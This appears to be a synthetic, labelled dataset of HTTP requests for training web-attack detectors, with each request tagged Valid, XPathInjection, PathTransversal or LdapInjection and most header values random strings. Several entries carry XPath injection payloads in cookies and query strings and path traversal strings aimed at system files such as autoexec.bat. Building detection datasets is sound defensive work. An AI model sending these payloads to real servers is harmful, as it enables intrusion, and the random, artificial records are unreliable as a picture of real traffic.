Accept-Language: pt-qlh3he;q=0.0, Euayth-ivO
Cache-Control: no-store
Client-ip: 149.120.182.235
Cookie: iptKXq7=e8c@;dpdq=seth;szxdrCot=me7zews0hhmu
Cookie2: $Version="3"
Date: Sun, 05 Jun 05 06:07:22 GMT
ETag: W/"a@hIMOkQOtqF.OewNMly"
Expect: 100-continue
From: itqecri@hmti.org
If-Modified-Since: Tue, 03 Feb 04 14:05:26 GMT
If-Unmodified-Since: Sat, 11 Sep 04 17:05:49 GMT
If-Match: "tpZHHU3TFY_tidElk_"
If-None-Match: "MSOjMxSTIaRdlZPho2d"
If-Range: Fri, 02 Dec 05 20:03:55 CET
Max-Forwards: 8861
MIME-Version: 0.1
Pragma: hirykyon=ivdaq
Proxy-Authorization: Digest qop=auth
Authorization: Digest nonce
Range: -35,310954-4,-65030
Referer: http://www.eavtr.gov/flfeVOeD/osiIh/htsk5Ede/nXy437cm/3b4dLyde.css
TE: trailers,trailers
Trailer: User-Agent
User-Agent: r8iMLhsd
UA-CPU: 68000
UA-Disp: 597,002,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4971x673
Via: s54r/1.7 www.36asiaj.png, 8.5 179.160.41.54
Transfer-Encoding: compress
Upgrade: swi/9.8, nYHnu/7.6
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 25.104.91.31
X-Serial-Number: 95729667
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

6iesYato=~teN5e<uo/&afuoIpu=stet&lnguetc8hrsm3wn=26783301&services2Oprocessing-instruction5aCzoe=5&nhiapeR=avi75tlinke&Dh=6zejnzf&DbaooigR=ao9

End - Id: 6956
Start - Id: 35916
class: XPathInjection
POST /mmYrgsarnf/c-AZls52/loJIvI5aIb.ZUiVd/gG9joesvawesloss/nF_A0RF5qCR/228nz7/lImlJVd.png? HTTP/1.0
Content-Length: 237
Content-Language: st,rAyaoen
Content-Encoding: identity
Content-Location: /tcsaieea/nhmwilhr.php3
Content-MD5: aWE0TG5vbWhkc2E3YW95aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 May 04 23:44:25 CET
Host: 135.205.84.107:00
Connection: close
Accept: audio/basic;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.177.61.125
Cookie: nfPz=orslaErechoiu;;eeme0r=has' or    6 < count(path/child::*)   or   'dta'   = '
Date: Fri, 25 Aug 06 13:56:55 CET
ETag: W/"So0c1aZ3EjHyt@m"
Expect: df9eki
If-Modified-Since: Fri, 10 Sep 04 23:19:47 UTC
If-Match: *
If-Range: Sat, 23 Apr 05 22:26:43 CET
Max-Forwards: 1
MIME-Version: 9.4
Referer: http://www.lntdoua.fr/vheSo/4ria.sh
Trailer: Trailer
User-Agent: ea5n/3.3
UA-CPU: x86
UA-Disp: 771,733,16
Via: nlhrie/4.3 www.eoeqesO.css
Transfer-Encoding: nTleoo
Warning: 688 108.112.238.171 "tdennhHcshnnrdee4Fjo" 

uny6hNlt=l9nNql s eev&ehtbstuiL0ih=eeFYy&JJe@D.=lv&E55uLtmpb2x_ti=tod&2senite7=0sock_streamYo |Is%ua4esua&iCZ9=0o&faEoS5iyyi=uth r&sitnsq9ah=lI_xhs&pc1telnet_pQA=83&leaizhstets2=e1iefenia&_CZp=458&u6ku=mghE&2T=aYi8D6@FUfor&smgfe3=d

End - Id: 35916
Start - Id: 3318
class: Valid
GET /bkfts/g_Vmq-5KuaJMheEV/e45jRlmQmhkfaw_-RI/uqLW/rhnp5romEs1/lnsgG/felgem5W.aspx?cnsap46me4oeal=nu&cQusigia=j3+&Tdftn=00909 HTTP/1.1
Host: 214.205.220.114
Connection: o7haaw
Accept: */*
Accept-Charset: iso-8859-15;q=0.8, iso-8859-8-i;q=0.8, cp-932, iso-8859-7;q=0.7
Accept-Encoding: gzip;q=0.2, identity;q=0.4
Accept-Language: 0plekne8-Tow;q=0.5
Cache-Control: max-age=47
Client-ip: 249.176.180.104
Cookie: YhEHimetahttplaTuS=eR$;B7fsty4sidi=Piehoeo;varB0passthru.w@=snrmaili;hpn1aeoFoDhrsZh=eonytfaoiern;Cllii3aet5uefi=4U
Cookie2: $Version="250"
Date: Sun, 12 Jul 09 23:25:59 GMT
ETag: W/"7aCyiCAwCfirpiBk4_"
Expect: wd2e
From: ieec@Aw8rhen.st
If-Modified-Since: Thu, 12 Apr 07 21:27:26 CET
If-Unmodified-Since: Thu, 03 Aug 06 07:00:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 176
MIME-Version: 4.9
Pragma: eN='a'
Proxy-Authorization: NTLM U2FFNWhzcjNhbmV5ZW1zYnM0ZXNkcnR0b2Vtb3RyZHJveG95dGdlbW51dWVuYw==
Authorization: Digest uri=/p71r/6g6N/si7l.asp
Range: 715429-,64862-,731-870612
Referer: /bAphtrn/hnlZe/i64sS.mpg
TE: deflate;q=0.1,trailers,deflate
Trailer: Expect
User-Agent: digdostan (iJkZiksm3)
UA-CPU: MIPS
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 5.5 www.eoenl.css, erngla/4.7 163.139.157.58
Transfer-Encoding: gzip
Upgrade: mc12rn/2.3, yttoni/9.0, sept/9.7, nuohee/2.9
Warning: 659 214.21.203.106 "Esha" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 246670364
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3318
Start - Id: 19719
class: Valid
GET /vLIa.php4?x1=86790252&9fIl=t&erI9.HJ=ewnoechokb&3ritnaeeur0t8=26&9tne=%40r0%289&QE9y@AMM_=e&iet8k=tmaetccopy&ayar=eQ9o&Xe4VX=6&FFueyKK=%5Bet5+e%3FS%27elniHupdateexecknph-from HTTP/1.1
Host: 130.98.31.33
Connection: utse
Accept: image/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 221.220.170.107
Cookie: 0eY6g=s;f3I@gIuk8=oeqxaeii$1d;1ez=8yntnnan;psO9q0_dVeSeB=$tb68st+dOwti)nw5w'object;9lAwldaer=6765002
Cookie2: $Version="61"
Date: Sun, 02 May 04 24:24:21 CET
ETag: "MV@5N.u9QtmtxGY"
Expect: eahee
From: moea@estmzx.uk
If-Modified-Since: Sat, 01 Dec 07 21:47:40 GMT
If-Unmodified-Since: Fri, 02 Feb 07 15:36:12 UTC
If-Match: "d6aiBtx2c_w9FhE"
If-None-Match: *
If-Range: Tue, 28 Aug 07 23:54:29 GMT
Max-Forwards: 19
MIME-Version: 5.3
Pragma: nbem='2h'
Proxy-Authorization: 6dadch 0marE=vognya
Authorization: srYn weuaaas=pnoYtea
Range: 521-871
Referer: http://www.iEao.be/QEQnbmw.tiff
TE: trailers
Trailer: Date
User-Agent: Mozilla/6.0 (Windows; U; WinNT 2.4; nN-ie; rv:2.3.0) Gecko/16552959
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 094x994
Via: 3SVws/6.8 97.212.76.175, HTTP/8.5 www.gesmlieS.js, ntt/1.6 www.ndupH.jpeg
Transfer-Encoding: identity
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 8538612066
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19719
Start - Id: 21747
class: Valid
GET /Olun3ssaoisc21rragf4/y_AjaiZhjFx/jselectdiv/0P7WYQh%uwgetSP4ilC/UsLHoHmYv/ntgrwaaxgfDi0yhoaete.gif?edRI3=775&sssgsAnphwgi=exB&Atvrovogi4j=tX%40w&Tt=52980&ehht4lsOouW=tsbre&4wgetOof_u0=194331956&2yincehnl=rtgUPJ&ebZlnniiTlritt=ayh&dml=75 HTTP/1.1
Host: www.n2loolErn.org:167
Connection: IeGadrpl
Accept: */*
Accept-Charset: iso-8859-15, x-mac-ce;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 240.244.160.241
Cookie: dloasri=%s? ;dhengTNte=-t dHktsvme;iso8oe65ts=x;gqyuth=froms@telnetOhid
Cookie2: $Version="06"
Date: Sun, 02 Mar 08 16:16:51 GMT
ETag: W/"q4pnhI1NSQfSL9Pc4w-P"
Expect: 100-continue
From: scmetNE@looeei.net
If-Modified-Since: Fri, 17 Jun 05 08:30:09 GMT
If-Unmodified-Since: Tue, 06 Apr 04 23:10:49 UTC
If-Match: "rHD19z_903NOLjnAc3"
If-None-Match: *
If-Range: "98jJ7HXq7HK03k2olcyG"
Max-Forwards: 8616
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: 0k9Twe twle=ds1o3ar
Authorization: Digest nonce
Range: 0-
Referer: http://www.uchtYeh.it/cizrpeon/rnia.mdb
TE: trailers
Trailer: TE
User-Agent: dZQIrpqLK http://www.onldhe.biz
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 035x416
Via: HTTP/2.1 129.116.31.180
Transfer-Encoding: deflate
Upgrade: eaw0U/0.9, r5loeg/6.1
Warning: 924 54.229.114.181 "smLesryihhrc" "Tue, 15 May 07 20:56:14 GMT"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21747
Start - Id: 48871
class: XPathInjection
GET /I@L1/qUKQ/8NSOdQE/PZ/wartiRo0yopaOe/H7JQfAshutdownXmetaaprocessing-instructionma/oaOr1tugasNito/nstcre2i0ngdrs2rns/J5ZBL3/Hwaoirrensse.htm?oueeeoordan=insertturLescriptxtermmochah&cyfhsock_streamUZ=sg&hWsmwR=systemd&BscriptYd73sdropT=trpMhha%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+%27et%27+%3D%27&el0eh=oechothnetcat+hf1Ccxeelh&xNIlsb.s=a.REJC&wner7I=w%29s7&ul=tvnaohavinggiooe1U HTTP/1.0
Host: 154.20.12.161:5390
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 81.197.139.145
Cookie: aeabnCatuni=152634;eoiuws8i=Ego;ZmochahHx=rhlseblireimgyrcs;tOrleltcaasosb=317
Cookie2: $Version="488"
Date: Mon, 10 May 04 09:18:43 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 29 May 04 05:16:03 GMT
If-Unmodified-Since: Fri, 13 Jul 07 14:35:23 GMT
If-Match: "0zapZ_yPZGKOXHkUbo_"
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: Mon, 30 Oct 06 05:00:55 CET
Max-Forwards: 234
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 03033-94733
Referer: http://d7hHr.fr/trat8vvh.cfm
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 0.9; 1e-de; rv:7.4.8) Gecko/02373275
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 2.8 238.120.164.33, HTTP/3.2 11.144.65.141
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48871
Start - Id: 14881
class: Valid
GET /eo2zS__YmdOhfO@EsrY.htm?nnek=0position&@Y2gu7t=aty&oieth1aSvss8krn=cTZm615&hrflh=5&hcaipisnlltic=u&dUoDe0=e4y1toatai&od5ihkjs4n=eD0bx&ihdq3B2eeGcfuOi=atf%27%5D6+qon&au=xmiwj6nVai&ie=h+b-tag&N9pchildGpNlunion-input=c%2Bih HTTP/1.0
Host: 114.208.150.198
Connection: feqyns
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic, windows-1257, euc-cn, x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: tmNevse-dsns, Hahzr-p;q=0.0, Xdn3nvHb-l, tRnar6nE-fssahw
Cache-Control: max-age=4307
Client-ip: 201.22.33.211
Cookie: n1gQstDxeema=7163;ostrstiie=1815
Cookie2: $Version="888"
Date: Sun, 19 Feb 06 12:28:10 UTC
ETag: "vfK09AcrV6cg79CI6"
Expect: MhSm
From: lowanht@ceRsaits.it
If-Modified-Since: Mon, 19 Sep 05 17:55:03 GMT
If-Unmodified-Since: Sat, 05 Nov 05 24:14:49 CET
If-Match: "UFcU1CV7bEZoezP"
If-None-Match: "8h.9BsaD1Q7dP2z2@"
If-Range: "jyb4NOArge9AEyWf"
Max-Forwards: 9523
MIME-Version: 3.1
Pragma: shdwx1='laawan6'
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: Basic YW9zczp5b2Vs
Range: -43,-61335,692292-223
Referer: /werqiaha/g4lreel/t5dhUs/hs3tco.php
TE: trailers
Trailer: Trailer
User-Agent: rkkS-sDWR http://www.n2uIe.biz
UA-CPU: 68000
UA-Disp: 5587,0901,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5504x4372
Via: 6.9 www.qhih.gif, hw5ya/4.1 www.tg2it8e.js
Transfer-Encoding: deflate
Upgrade: rendin/7.0, csnm/2.2, nee/8.0, snEh/6.4
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14881
Start - Id: 32318
class: Valid
GET /apfnleu6mP/ctoengydj9e/Dt3/aq.L/nte8atto/atacn1skea7aiOsals/on/bc2VxnoDld8iTzKz0Puw/JB.asmx?re=%5Dlme&1ietLevap=tOhCo%3EYshs&6group bymW_qua1=on%7CreOUEboot.inij+%5D&huenitmhs6a=Iiu HTTP/1.0
Host: www.n0bsmger.gov
Connection: keep-alive
Accept: audio/basic, audio/basic;q=0.6, image/png
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity, deflate;q=0.4, compress, identity
Accept-Language: p6n-i;q=0.3, z5hhILfd-ee;q=0.5, enbO2-hm5t6cpf;q=0.7
Cache-Control: no-store
Client-ip: 248.252.118.87
Cookie: nhpaw=roeUrDorsdor1abg7;fNi@mlog=454943193
Cookie2: $Version="669"
Date: Wed, 01 Feb 06 18:39:58 UTC
ETag: W/"_jWU7q6KTdG8xno3OtW"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Sun, 17 Oct 04 20:23:13 GMT
If-Unmodified-Since: Sat, 27 Feb 10 02:48:05 UTC
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "hPEpQ1o3r9j31l2eMcD"
If-Range: "2fVtkoLDJtHvz1Fc"
Max-Forwards: 503
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dWVFeG5jM2Zsc2Z1eW5uaG5SVGhlQkV6bW9pNmRvTmluc3RyaXRiVW56MQ==
Authorization: ikee aonki=otaot
Range: 2-941553
Referer: http://anaAan.ch/E3ppj/hEnr/1taeno/eoiItnp.jpeg
TE: chunked;q=0.3,trailers
Trailer: Range
User-Agent: Mozilla/5.0 (compatible; Konqueror/2.6; Mac OS X; csieoolge)
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: 7gVst/2.0 237.247.232.71
Transfer-Encoding: deflate
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 990 99.59.172.76 "cgrwSsa" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 454901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32318
Start - Id: 12037
class: Valid
GET /ondyuotbaasarre6/3nsmhaverortsile/w@UWaQnnlfKSRtvEyQ4a/enpZnayqlR8EWx/09.hXJb7RnAfwXC.dll?od6ycn=1478689&vdMWX5Ah=Ohni8daeAeOuh9&inxl=73&17y7vy=65049050&Yh31zINNJG1=0%3Di&JhWNgV=989042805&tenLihshi=3etohi&Nta=75&fYiz9tIweib=vecd6aOs&lrEa=810197&_X91FrQ=8iopen%3A&gyrTaaaaoem=ae%2B9t1&1dwese=letoynEhvAitaga HTTP/1.0
Host: www.xngTtles.de
Connection: glPii
Accept: */*
Accept-Charset: windows-874;q=0.0, koi8-r, iso-8859-8;q=0.2, x-mac-chinesesimp;q=0.5, x-mac-ce
Accept-Encoding: *;q=0.9
Accept-Language: eerhSw-8u, 0hhrb-uPlNtd;q=0.6, rzp1eunt-3npti, ye6a-e9;q=0.9, e-Eda3yien;q=0.7
Cache-Control: min-fresh=78823
Client-ip: 149.5.101.39
Cookie: u1=h9utwVz1Eck;96systemf3v_=oyu4ismuuaethdi;mln0otspdectogt=nsz4oteUde&ik$l;lexecSWug=1896979125;2clcoeuItilatd=mdie;mhndaDyucuiy=alsec7ini
Cookie2: $Version="585"
Date: Wed, 04 Jan 06 04:51:00 CET
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: iaed6wap=Sox6i;utuee
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 22 Feb 10 18:35:52 GMT
If-Unmodified-Since: Wed, 26 Sep 07 14:42:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8972
MIME-Version: 6.1
Pragma: iUc=ptzrStes
Proxy-Authorization: Digest nc=117fd3f5
Authorization: hajt et08ea=oeev
Range: 421490-
Referer: http://8duoaoi.ch/k5robx.exe
TE: gzip;q=0.4,trailers
Trailer: Via
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 0.0; ry-8k; rv:4.8.7) Gecko/50606278
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: FTP/0.7 www.rsNt.shtml
Transfer-Encoding: deflate
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 387 192.94.148.208 "eehfyveehnqh24sA" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 0508881327530
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12037
Start - Id: 45764
class: PathTransversal
GET /lOnnctowiasm/iwmaxMN1p/tiDtdc3ieRyPe8/jYBgOpassthruOEpassthruNlperlE/rvOIinGCWRiPpU9EWUP/a6oiiyn/sXFxhL_DWEeGAt/npjpNesyqeuedztta/IvtyagudRnsoe7/kTlaHt3yptpsHyg/mail@af_KQ/dveaZLvZRvwBRkz-Mm.html?ow=%5D1%3Exp_l+tmpyieu&weconteiaodly=2407&1teogs=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&osMfoaRktyna=9626&cl1teeiiC=9 HTTP/1.0
Host: www.gereu.de
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=3
Client-ip: 94.195.108.172
Cookie: tar=169;4HmetaGrkf=7868;rrvlei=xKNL9xuJ48B;uiwejtboepA=cxuo9Vm6;Zexecwc=2622;8m=94674
Cookie2: $Version="51"
Date: Tue, 19 Jan 10 03:39:02 UTC
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: 100-continue
From: EelBbSo@eeaysiht.net
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Sat, 18 Apr 09 10:36:09 CET
If-Match: "phZOoCP_Yg8fQDTwm"
If-None-Match: *
If-Range: *
Max-Forwards: 0588
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: ehrxh feyrt=0igtd
Authorization: NTLM ZXdhbnV1NzFJbmVMc2Z6T2t0cnZFdGduNTl4NHJkNWF0eXV3aWdTdUhub3M=
Range: -500252,934-3694
Referer: /bm2ze/ocgiotht/nsWs.shtml
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: aKVmBVcx http://www.sDaaatn.cz
UA-CPU: MIPS
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 1.2 52.118.115.52
Transfer-Encoding: compress
Upgrade: tlly5t/1.5
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 217.11.93.180
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45764
Start - Id: 3445
class: Valid
GET /d2ohllhC7oz3EC/nph-r/ops.pxpK@soK.htm? HTTP/1.1
Host: 57.242.1.45:80
Connection: close
Accept: audio/*, audio/x-wav;q=0.1
Accept-Charset: cp-932
Accept-Encoding: *
Accept-Language: eNdrnsa-hTt
Cache-Control: max-stale
Client-ip: 127.241.78.132
Cookie: rdiasao=cqe;V2oYOB9=5764162;9epilklon=737216;eilwjIee=812;4passthru6childorr=ddaposition
Cookie2: $Version="0"
Date: Sun, 25 Apr 04 02:28:38 CET
ETag: "Cubm71wNRBtUKwt_."
Expect: lriuAx3=gltbi
From: otEj@3satd.de
If-Modified-Since: Wed, 13 Jul 05 14:02:42 UTC
If-Unmodified-Since: Sat, 16 Aug 08 11:57:47 GMT
If-Match: *
If-None-Match: "aMdUI56o@9YHnrlL.G"
If-Range: "k0TnObcZBJ81AMZdNt"
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: oitRr5 fiwdrL2=HpdIi
Range: -13935,-8
Referer: /srrdat/Eeeday3x/attbn/tdoh71eu.nsf
TE: deflate;q=0.3
Trailer: Date
User-Agent: gdsoe/6.4.4.2.2
UA-CPU: MIPS
UA-Disp: 426,091,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 969x7653
Via: FTP/3.4 110.66.153.44
Transfer-Encoding: compress
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 723 22.50.164.119:75937 "eENaebtayhseTmiil0U" 
X-Forwarded-For: 118.211.6.212
X-Serial-Number: 80963840971
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3445
Start - Id: 45675
class: PathTransversal
GET /7vzSYwp-j.IvoCxnetcatP/ArcpdM/InshraeecrnD/efOzJQi/evsthuiehyd6onia/cnqwnBn9zfcee/n9ah4cjne98entaD.exe?wdptAz=9&taaeTae=786&optF@z=openopt&Ctexmx=%5C5wkecf%27al&tLto4re5t=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&dr9Gn4hmMuqMh=scriptgroup+by0aucsme&iud4nueim3=%24+X%3B+&k0le=3658096007&midpsea7=bvSdcw&ksHse=hSHU&DdI2kdtnieCae=rgvbscript&iw9ye6mibdL=7750&nXs=920 HTTP/1.1
Host: 0.215.157.155
Connection: lriwrin
Accept: audio/x-wav, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: of=49
Cookie2: $Version="542"
Date: Fri, 19 Nov 04 01:35:18 UTC
ETag: "d3OxHUukZzKDM.slNqr5"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Sun, 14 Mar 04 19:12:49 CET
If-Unmodified-Since: Mon, 27 Oct 08 02:40:37 UTC
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Mon, 23 Apr 07 11:48:01 CET
Max-Forwards: 20
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: NTLM dHNjbmVkckVldHlyNHRsbWVhdDBoZGV3dG9jbnJhbGQ5ZWFub2UxRXRzc29IaXc=
Range: -368400,7896-37283
Referer: http://aicor.uk/sf6ts/GetehN/ospd7ac.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.3 (compatible; itow; Open BSD i586; sIaoecawa)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: smhza/6.1, omsu/2.6, 8ysein/9.3
Warning: 534 45.179.228.107 "hsatu" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45675
Start - Id: 25873
class: Valid
GET /script9/ocu/oDSy2w.difE/ratSlsMlAlR/liROkHUvhuBzav/btrAnrimet/r2rBotle/document6n4dZV7zSselect/rWlH8yTXfBYaasb@XT/ga6nkoan1kiwzo6ei/7rc.htm?crsaoaoel=3e4eoaoaRae58&so4aari=ae%3C&msnr=hsselectu&siwWas1yiPl=oDee5&NO0Bh=sa4siatdtconnect&oish=30789393&eilayrc587ez=eafbsr&SriaIa6i=yrDrexeoanirn&hheemyEpqOds=rOjpdpaaobjser HTTP/1.0
Host: www.oeutNe.cz
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.5
Accept-Encoding: gzip, deflate, identity, compress;q=0.4, compress
Accept-Language: rat-b;q=0.7, mrbOisw-t, 3tp-p;q=0.4, xt-epH, a4R-rtnhx;q=0.3
Cache-Control: max-age=0526
Client-ip: 208.224.54.200
Cookie: X.69crMH=9
Cookie2: $Version="13"
Date: Wed, 30 Dec 09 07:33:35 GMT
ETag: "9ENFc3TAAjTFgmlynh"
Expect: TwAOmaso=sdty;a6UohENu
From: be0oew@2lap0f3uX7.be
If-Modified-Since: Mon, 10 Aug 09 23:33:32 GMT
If-Unmodified-Since: Fri, 12 May 06 21:13:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 44
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nc=ac6a8cA0
Authorization: Digest algorithm=MD5-sess
Range: 843-0717,4422-,58581-1046
Referer: /md0r/wreidaad/lAwlq/egqdnra7.ace
TE: gzip
Trailer: Referer
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 9.0; cn-ko; rv:7.0.9) Gecko/93825483
UA-CPU: 68000
UA-Disp: 291,6267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 027x334
Via: HTTP/9.7 29.200.197.176
Transfer-Encoding: gzip
Upgrade: hauYa/2.7, edsod/7.0
Warning: 475 239.46.236.100:495 "nrrfTazoeykacyd" "Wed, 17 Sep 08 02:20:51 CET"
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1952797256
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25873
Start - Id: 26099
class: Valid
GET /retrlifTuesneloaorf7/eEgjgZ@F.b/zrRccziuezhEtdelms4o/0qrannboofs/iSR/4xaWUPzOtsShsJbh/LrhT/syAtTexd.js? HTTP/1.0
Host: 143.29.195.228:14
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-roman, iso-2022-kr;q=0.2, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: oosa-iaieEit;q=0.5, s8a-er3ne, m8biha-a
Cache-Control: min-fresh=74671
Client-ip: 159.45.113.207
Cookie: gosWObc=6602057486;reT0otae=fwGwwn;nno=[oehnrs6st;e4n=%pj cn;Ay2p2nMsAQ=33350703;g90te=my27n53emi
Cookie2: $Version="1"
Date: Mon, 24 Aug 09 06:52:39 GMT
ETag: "Ql9OThmryf.DkekWJs"
Expect: rbrac6=FnS6;tssyaNqE
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 18 Sep 05 17:06:51 CET
If-Unmodified-Since: Sat, 21 Feb 09 24:48:44 CET
If-Match: "LWxjqfSrilakD1UoU"
If-None-Match: "CQr8Ek@Odyj1YUA"
If-Range: Sun, 02 Oct 05 08:02:03 UTC
Max-Forwards: 22
MIME-Version: 4.2
Pragma: oin4lL=ionrjn
Proxy-Authorization: Digest uri=http://tehX8m.it/7nfoxbtj/obi9n.gif
Authorization: Digest opaque="4shTo"
Range: -41,2933-4708,1-5204
Referer: http://www.dfah3.be/pTsqinsl/0igs/d2ac.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 2.2; 9s-nt; rv:6.3.4) Gecko/04879993
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 096x0326
Via: 0.8 www.ayvteen.html
Transfer-Encoding: deflate
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 07602073887440146
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26099
Start - Id: 37492
class: LdapInjection
